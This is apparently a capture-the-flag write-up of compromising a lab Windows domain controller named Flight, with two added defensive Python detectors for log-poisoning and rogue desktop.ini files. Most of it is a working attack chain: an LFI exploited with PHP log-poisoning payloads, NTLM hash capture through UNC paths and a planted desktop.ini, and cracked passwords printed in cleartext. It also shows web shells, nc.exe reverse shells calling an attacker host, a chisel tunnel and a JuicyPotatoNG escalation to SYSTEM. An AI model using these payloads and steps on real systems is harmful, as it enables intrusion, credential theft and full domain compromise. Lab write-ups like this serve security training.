Recon
Nmap scan
└─$ nmap 10.10.11.187 -A -Pn -p- -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-14 00:09 CET
Nmap scan report for 10.10.11.187
Host is up (0.023s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-14 06:11:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Here we face a Windows machine hosting an airline website.
Versions
Thanks to the nmap scan and Wappalyzer we can get the versions of Apache, PHP and OpenSSL:
- Apache 2.4.52
- PHP 8.1.1
- OpenSSL 1.1.1m
DNS
Using dig, I try to find some subdomains.
└─$ dig srv @10.10.11.187 flight.htb
; <<>> DiG 9.18.8-1-Debian <<>> srv @10.10.11.187 flight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18784
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;flight.htb. IN SRV
;; AUTHORITY SECTION:
flight.htb. 3600 IN SOA g0.flight.htb. hostmaster.flight.htb. 41 900 600 86400 3600
;; Query time: 68 msec
;; SERVER: 10.10.11.187#53(10.10.11.187) (UDP)
;; WHEN: Sat Jan 14 00:18:28 CET 2023
;; MSG SIZE rcvd: 89
Trying a DNS zone transfer:
└─$ dig axfr flight.htb @10.10.11.187
; <<>> DiG 9.18.8-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.
It failed.
Subdomain fuzzing
Then, I tried to fuzz subdomains.
└─$ ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: FUZZ.flight.htb" -u http://10.10.11.187 -t 100 -fs 7069
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 282ms]
We get a new subdomain: school.flight.htb.
Trying LFIs
The index.php of http://school.flight.htb/ has a view parameter that refers to pages. I tried LFIs.
└─$ curl http://school.flight.htb/index.php?view=../
[...]
<h1>Suspicious Activity Blocked!<h3>Incident will be reported</h3>
[...]
LFI seems to work. Let's try with a wordlist. I tried with the file_inclusion_linux.txt wordlist.
└─$ ffuf -w file_inclusion_linux.txt -u "http://school.flight.htb/index.php?view=FUZZ" -t 100 -fs 1170,1102 -fc 500
/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 44ms]
/xampp/php/php.ini [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 52ms]
/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 200ms]
/xampp/phpMyAdmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 213ms]
/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 120ms]
/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 246ms]
AD Recon
List guest access
└─$ enum4linux -a -u "" -p "" 10.10.11.187 && enum4linux -a -u "guest" -p "" 10.10.11.187
[+] Server 10.10.11.187 allows sessions using username '', password ''
[E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests.
# trying to list shares
└─$ impacket-smbclient 10.10.11.187
# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
We got an access denied :(
User bruteforce via Kerberos pre-authentication
└─$ ./kerbrute -d flight.htb --dc 10.10.11.187 -t 100 usernames.txt
[+] VALID USERNAME: administrator@flight.htb
Using kerbrute we can't find any user except the Administrator account.
Path to the first shell
Trying to exploit logs
So, we have access through the LFI to the website's log files. Let's try to poison the logs to gain shell access.
First, we check that our requests are logged into the file. I simply curled the log file through the LFI:
└─$ curl "http://school.flight.htb/index.php?view=/xampp/apache/logs/access.log"
10.10.16.7 - - [15/Jan/2023:12:50:58 -0800] "GET /index.php?view=/xampp/apache/logs/error.log HTTP/1.1" 200 83249 "-" "curl/7.86.0"
This confirms that our requests are logged.
I intercepted a request to /xampp/apache/logs/access.log using Burp. Then, I replaced the User-Agent with this PHP payload: <?php system($_GET['cmd']); ?>
GET /index.php?view=/xampp/apache/logs/access.log HTTP/1.1
Host: school.flight.htb
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Checking the logs, we see that our payload is in the log file:
10.10.16.7 - - [15/Jan/2023:13:01:10 -0800] "GET /index.php?view=/xampp/apache/logs/access.log HTTP/1.1" 200 100727 "-" "<?php system($_GET['cmd']); ?>"
Then, we send the request. Our payload is now in the log file. We can check that it works by sending commands through it.
# sending a whoami command
└─$ curl "http://school.flight.htb/index.php?view=%2Fxampp%2Fapache%2Flogs%2Faccess%2Elog%26cmd%3Dwhoami"
Checking the logs, the payload does not seem to work :(
Analyzing logs
While trying log poisoning, I found weird requests in the log file. At first, I thought they were another person's requests. To check, I restarted the machine and looked at the logs right after the restart.
└─$ curl "http://school.flight.htb/index.php?view=/xampp/apache/logs/access.log"
[...]
192.168.22.245 - - [22/Sep/2022:13:34:56 -0700] "GET /index.php?view=data:,%3C?system($_GET[%27x%27]);?%3E&x=dir HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:34:56 -0700] "GET /index.php?view=data:,%3C?system($_GET[%27x%27]);?%3E&x=dir HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:00 -0700] "GET /index.php?view=\\\\\\\\192.168.22.248\\\\ HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:13 -0700] "GET /index.php?view=//192.168.22.248/asd HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:56 -0700] "GET /index.php?view=//192.168.22.249/share/a.php HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:36:01 -0700] "GET /index.php?view=//192.168.22.249/share/a.phar HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:45:39 -0700] "GET /index.php?view=//192.168.22.249/share/a.php HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
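As an added defensive example (not part of the original writeup): a small detector that parses access.log lines in the combined format shown above and flags the four request patterns this page exhibits, a local path or traversal in the view parameter, a stream wrapper such as data:, a UNC path that makes the web server authenticate outbound, and a PHP tag in a request header (log poisoning). The sample lines are constructed from the entries above with shortened User-Agents.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log line, as written by the XAMPP access.log quoted on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(php|=)?', re.IGNORECASE)
WRAPPERS = ('data:', 'php://', 'phar://', 'expect://', 'http://', 'ftp://')

def query_params(target):
    """Split the raw query on '&' only and percent-decode keys and values by hand,
    so a literal ';' inside a value (present in the data: payloads) is never a separator."""
    params = {}
    for part in urlsplit(target).query.split('&'):
        key, _, value = part.partition('=')
        params.setdefault(unquote(key), []).append(unquote(value))
    return params

def classify_view(value):
    """Findings for one decoded value of the vulnerable 'view' parameter."""
    v = value.replace('\\', '/')
    if re.match(r'^/{2,}[^/]+/', v):      # //host/share/...: server authenticates outbound (NTLM leak)
        return ['unc-path']
    if v.lower().startswith(WRAPPERS):    # data:, php://, remote URL: code or remote inclusion
        return ['stream-wrapper']
    if '../' in v or v.startswith('/'):   # traversal or absolute local path (e.g. /xampp/php/php.ini)
        return ['local-file-path']
    return []

def inspect_line(line):
    """Return (ip, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    for value in query_params(m.group('target')).get('view', []):
        findings.extend(classify_view(value))
    if PHP_TAG_RE.search(m.group('ua') + m.group('referer')):
        findings.append('php-tag-in-header')  # log poisoning attempt
    return m.group('ip'), findings

def scan(lines):
    """(ip, findings) for every parsable line that raised at least one finding."""
    results = (inspect_line(line) for line in lines)
    return [r for r in results if r and r[1]]

# Constructed sample modelled on the access.log entries quoted above (User-Agents shortened).
SAMPLE_LOG = [
    '10.10.16.7 - - [15/Jan/2023:13:01:10 -0800] "GET /index.php?view=/xampp/apache/logs/access.log HTTP/1.1" 200 100727 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '192.168.22.245 - - [22/Sep/2022:13:34:56 -0700] "GET /index.php?view=data:,%3C?system($_GET[%27x%27]);?%3E&x=dir HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    r'192.168.22.245 - - [22/Sep/2022:13:35:00 -0700] "GET /index.php?view=\\\\192.168.22.248\\ HTTP/1.1" 200 27 "-" "Mozilla/5.0"',
    '192.168.22.245 - - [22/Sep/2022:13:35:56 -0700] "GET /index.php?view=//192.168.22.249/share/a.php HTTP/1.1" 200 27 "-" "Mozilla/5.0"',
    '10.10.16.7 - - [15/Jan/2023:12:40:01 -0800] "GET /index.php?view=home.html HTTP/1.1" 200 3996 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```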
Those logs are still there! Let's try to replay them :)
So, I opened an SMB server using Impacket and tried to request a file on it.
└─$ ls
coucou.txt
# opening smb server
└─$ impacket-smbserver s . -smb2support
└─$ curl "http://school.flight.htb/index.php?view=//10.10.16.7/s/coucou.txt"
# checking smb server
[*] Incoming connection (10.10.11.187,49726)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:a7d83728d25d2e033fdc56841b5c31ed:010100000000000080d2df7ef028d901bbcc4d0881b48f4500000000010010007a005600790065004400790073004900030010007a005600790065004400790073004900020010007000630077007700590046005300640004001000700063007700770059004600530064000700080080d2df7ef028d901060004000200000008003000300000000000000000000000003000000df8da0562b86bed46dbb09b63e186a3771b6773f709ca7aa349f37ec3c271330a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
There we go, we got a connection from the machine!
I tried to crack the NTLMv2 hash using hashcat.
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:a7d83728d25d2e033fdc56841b5c31ed:010100000000000080d2df7ef028d901bbcc4d0881b48f4500000000010010007a005600790065004400790073004900030010007a005600790065004400790073004900020010007000630077007700590046005300640004001000700063007700770059004600530064000700080080d2df7ef028d901060004000200000008003000300000000000000000000000003000000df8da0562b86bed46dbb09b63e186a3771b6773f709ca7aa349f37ec3c271330a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13
We got our first credentials: svc_apache:S@Ss!K@*t13
Then, I connected to the SMB server to enumerate shares using our newly acquired creds.
└─$ impacket-smbclient svc_apache@10.10.11.187
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: S@Ss!K@*t13
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web
It works! We get multiple shares. I dumped the shares to look for users, passwords or any other interesting information, using DumpSMBShare from p0dalirius.
Exploring the shares, we found that Web contains the files of the flight.htb and school.flight.htb websites.
└─$ tree -L 2 Web
Web
├── flight.htb
│ ├── css
│ ├── images
│ ├── index.html
│ └── js
└── school.flight.htb
├── about.html
├── blog.html
├── home.html
├── images
├── index.php
├── lfi.html
└── styles
But sadly, we don't have write permissions on any share.
Enumerate LDAP
I tried to enumerate LDAP information using the bloodhound-python tool.
└─$ bloodhound-python -u svc_apache -p 'S@Ss!K@*t13' -d 'flight.htb' -c ALL -ns 10.10.11.187
INFO: Found AD domain: flight.htb
INFO: Connecting to LDAP server: g0.flight.htb
INFO: Connecting to LDAP server: g0.flight.htb
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 0 trusts
We found 16 users:
└─$ cat 20230115170643_users.json | jq '.data[].Properties |"\(.name) --- \(.description)"'
"NT AUTHORITY@FLIGHT.HTB --- null"
"O.POSSUM@FLIGHT.HTB --- Helpdesk"
"SVC_APACHE@FLIGHT.HTB --- Service Apache web"
"D.TRUFF@FLIGHT.HTB --- Project Manager"
"I.FRANCIS@FLIGHT.HTB --- Nobody knows why he's here"
"W.WALKER@FLIGHT.HTB --- Payroll officer"
"C.BUM@FLIGHT.HTB --- Senior Web Developer"
"V.STEVENS@FLIGHT.HTB --- Secretary"
"M.GOLD@FLIGHT.HTB --- Sysadmin"
"G.LORS@FLIGHT.HTB --- Sales manager"
"L.KEIN@FLIGHT.HTB --- Penetration tester"
"R.COLD@FLIGHT.HTB --- HR Assistant"
"KRBTGT@FLIGHT.HTB --- Key Distribution Center Service Account"
"ADMINISTRATOR@FLIGHT.HTB --- Built-in account for administering the computer/domain"
"S.MOON@FLIGHT.HTB --- Junion Web Developer"
"GUEST@FLIGHT.HTB --- Built-in account for guest access to the computer/domain"
I tried to spray the password we have against our new user list.
└─$ crackmapexec -t 100 smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\d.truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\i.francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
We found that the credentials s.moon:S@Ss!K@*t13 work for SMB! Maybe the user has write permissions on shares.
Using impacket-psexec we found that the share Shared is writable.
└─$ impacket-psexec s.moon@10.10.11.187
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.11.187.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file FYmMQyHb.exe
[-] Error uploading file FYmMQyHb.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
Steal NTLM hashes
After some research I found that we can write files with specific extensions, and that the files are deleted after a while. It means that there is probably a user who removes files from the share. After reading the NTLM theft documentation from HackTricks, I found that a desktop.ini file can be abused to initiate an NTLM authentication to an attacker-controlled host. To do so, I wrote the following desktop.ini file.
└─$ cat desktop.ini
[.ShellClassInfo]
IconResource=\\10.10.16.7\coucou
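As an added defensive counterpart (not part of the original writeup): a scanner that walks a share tree and reports desktop.ini files, and .url shortcuts, which use the same IconFile mechanism, whose icon path points at a remote host, so a planted file like the one above is caught before a user's Explorer session authenticates to it. The share layout and the 10.10.16.7 path are constructed for the sample.

```python
import configparser
import os
import re
import tempfile

ICON_KEYS = ('iconresource', 'iconfile')  # option names as configparser lower-cases them
UNC_RE = re.compile(r'^(?:\\\\|//)([^\\/,]+)')  # \\host\... or //host/..., captures the host

def read_ini(path):
    """Parse an ini-style file; Explorer also accepts UTF-16 desktop.ini, so fall back to it."""
    try:
        with open(path, encoding='utf-8-sig') as fh:
            text = fh.read()
    except UnicodeDecodeError:
        with open(path, encoding='utf-16', errors='replace') as fh:
            text = fh.read()
    cp = configparser.RawConfigParser(strict=False)  # no interpolation, tolerate duplicate keys
    try:
        cp.read_string(text)
    except configparser.Error:
        pass  # unparsable file: return an empty parser, nothing to flag
    return cp

def remote_icon_refs(path):
    """Return [(section, key, host)] for every icon key whose value points at a UNC host."""
    refs = []
    cp = read_ini(path)
    for section in cp.sections():
        for key in ICON_KEYS:
            m = UNC_RE.match(cp.get(section, key, fallback='').strip())
            if m:
                refs.append((section, key, m.group(1)))
    return refs

def scan_share(root):
    """Walk a share tree; report desktop.ini and .url files whose icon loads from a remote host."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() != 'desktop.ini' and not name.lower().endswith('.url'):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            hits += [(rel, key, host) for _s, key, host in remote_icon_refs(full)]
    return sorted(hits)

def build_sample_share():
    """Constructed sample share: a benign desktop.ini plus one planted like the page's."""
    root = tempfile.mkdtemp(prefix='shared-')
    os.makedirs(os.path.join(root, 'docs', 'drop'))
    with open(os.path.join(root, 'docs', 'desktop.ini'), 'w') as fh:
        fh.write('[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n')
    with open(os.path.join(root, 'docs', 'drop', 'desktop.ini'), 'w') as fh:
        fh.write('[.ShellClassInfo]\nIconResource=\\\\10.10.16.7\\coucou\n')
    return root

if __name__ == '__main__':
    for rel, key, host in scan_share(build_sample_share()):
        print(f'{rel}: {key} loads its icon from remote host {host}')
```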
Then, I opened a listener using Responder.
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:9035fadb4a6b1c[...]
And there it is! We get a new hash from user c.bum!
Using hashcat we can retrieve the password.
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
C.BUM::flight.htb:9035fadb4a6b1c86:a2f9973e07164b3ec76620a67194f8c9:[...]:Tikkycoll_431012284
We now have new credentials: c.bum:Tikkycoll_431012284
We can get the user flag :)
└─$ impacket-smbclient c.bum@10.10.11.187
# use Users
# cat C.Bum\Desktop\user.txt
**************************a23826
We can get a shell by uploading nc.exe and a PHP payload.
# Upload nc.exe and the PHP payload
└─$ impacket-smbclient c.bum@10.10.11.187
# use Web
# cd school.flight.htb
# put /home/pezzz/HTB/boxtmp/e.php
# put /home/pezzz/HTB/pentest-tools/win-exploits/nc.exe
# PHP Payload
└─$ cat e.php
<?php system($_REQUEST['cmd']); ?>
# Create a reverse shell
└─$ curl "http://school.flight.htb/e.php?cmd=powershell%20-Command%20%22C:%5Cxampp%5Chtdocs%5Cschool.flight.htb%5Cnc.exe%2010.10.16.7%204444%20-e%20powershell%22"
# Listener
PS C:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
Path to the privesc
c.bum user
Using RunasCs we can run specific processes with different permissions than the user's current logon by providing explicit credentials. As we have c.bum's password, I tried to execute commands as c.bum.
To do so, we have to compile the binary on the host using the .NET Framework csc.exe compiler. Then, we try to execute a command as c.bum.
# Upload RunasCs.cs on the machine from the share
# put /home/pezzz/HTB/pentest-tools/win-exploits/RunasCs/RunasCs.cs
# On the machine
PS C:\xampp\htdocs\school.flight.htb> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
PS C:\xampp\htdocs\school.flight.htb> .\RunasCs.exe c.bum Tikkycoll_431012284 whoami
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
flight\c.bum
It works! We can execute commands as c.bum :)
We can now open a listener on our machine to get another reverse shell.
C:\Windows\Temp\a>.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.16.7:4446
.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.16.7:4446
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5c2e9$\Default
[+] Async process 'cmd.exe' with pid 1752 created and left in background.
└─$ rlwrap nc -lvnp 4446
listening on [any] 4446 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 53536
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
flight\c.bum
After some research I did not find any way to privesc. The users don't have any interesting privilege.
Exploiting local service
Analyzing open ports using netstat, we found that there is a service running locally on port 8000. I opened a chisel tunnel to access the service from my machine.
C:\Windows\Temp\a>.\chisel_1.7.7_windows_amd64.exe client 10.10.16.7:2222 R:8000:127.0.0.1:8000
.\chisel_1.7.7_windows_amd64.exe client 10.10.16.7:2222 R:8000:127.0.0.1:8000
2023/01/16 20:56:16 client: Connecting to ws://10.10.16.7:2222
2023/01/16 20:56:16 client: Connected (Latency 15.4784ms)
└─$ ./chisel_1.7.7_linux_amd64 server -p 2222 --reverse
2023/01/16 22:55:18 server: Reverse tunnelling enabled
2023/01/16 22:55:18 server: Fingerprint hGrWRgzlN7QsnD/6nzcB1UzXZ6uyiSfa6/ARGBlZZdo=
2023/01/16 22:55:18 server: Listening on http://0.0.0.0:2222
2023/01/16 22:56:17 server: session#1: tun: proxy#R:8000=>8000: Listening
The tunnel is now up. We can now try to access the service from our machine.
Here we face a new website built with the Microsoft ASP.NET Framework. Searching on the target, we found that the website files are located at C:\inetpub\development.
I uploaded an ASPX reverse shell on the target, at C:\inetpub\development\shell.aspx, to try to gain a reverse shell. Requesting the file, we get a new shell!
└─$ rlwrap nc -lvnp 4447
listening on [any] 4447 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 49812
Spawn Shell...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
We are now running as the iis apppool\defaultapppool user. Checking privileges, we found that the user has SeImpersonatePrivilege. Maybe we can impersonate Administrator.
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Impersonate Administrator
With SeImpersonatePrivilege we can impersonate a user to escalate from a Windows service account to NT AUTHORITY\SYSTEM.
To do so, we can try the RottenPotato or JuicyPotato exploits. I uploaded a binary on the target and tried the impersonation.
c:\windows\system32\inetsrv>C:\Windows\Temp\b\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i
C:\Windows\Temp\b\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\>whoami
nt authority\system
It works! We can get the root flag :)